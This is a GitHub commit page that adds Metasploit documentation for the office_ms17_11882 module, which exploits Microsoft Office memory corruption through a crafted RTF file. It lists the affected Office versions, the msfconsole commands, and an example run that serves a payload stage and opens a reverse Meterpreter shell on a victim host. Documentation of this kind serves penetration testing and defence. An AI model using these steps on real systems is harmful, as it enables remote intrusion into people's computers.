Skip to content

Commit fcf2cfa

Browse files
author
Austin
authored
Create office_ms17_11882.md
1 parent f7e2fb3 commit fcf2cfa

File tree

1 file changed

+56
-0
lines changed

1 file changed

+56
-0
lines changed

documentation/modules/exploit/windows/fileformat/office_ms17_11882.md

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim
2+
to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user.
3+
4+
## Vulnerable Application
5+
6+
- Microsoft Office 2016
7+
- Microsoft Office 2013 Service Pack 1
8+
- Microsoft Office 2010 Service Pack 2
9+
- Microsoft Office 2007
10+
11+
## Verification Steps
12+
13+
1. Start msfconsole
14+
2. Do: `use exploit/windows/fileformat/office_ms17_11882`
15+
3. Do: `set PAYLOAD [PAYLOAD]`
16+
4. Do: `run`
17+
18+
## Options
19+
### FILENAME
20+
Filename to output, and location to which should be written.
21+
22+
23+
## Example
24+
25+
```
26+
msf > use exploit/windows/fileformat/office_ms17_11882
27+
msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf
28+
FILENAME => /home/mumbai/file.rtf
29+
msf exploit(office_ms17_11882) > set LHOST ens3
30+
LHOST => ens3
31+
msf exploit(office_ms17_11882) > set LPORT 35116
32+
LPORT => 35116
33+
msf exploit(office_ms17_11882) > run
34+
[*] Exploit running as background job 0.
35+
36+
[*] Started reverse TCP handler on 192.168.0.11:35116
37+
msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo
38+
[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo
39+
[*] Server started.
40+
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
41+
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
42+
[*] Sending stage (205379 bytes) to 192.168.0.24
43+
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
44+
sessions -i 1
45+
[*] Starting interaction with 1...
46+
47+
meterpreter > sysinfo
48+
Computer : TEST-PC
49+
OS : Windows 7 (Build 7601, Service Pack 1).
50+
Architecture : x64
51+
System Language : en_US
52+
Domain : WORKGROUP
53+
Logged On Users : 1
54+
Meterpreter : x64/windows
55+
meterpreter >
56+
```

0 commit comments

Comments
 (0)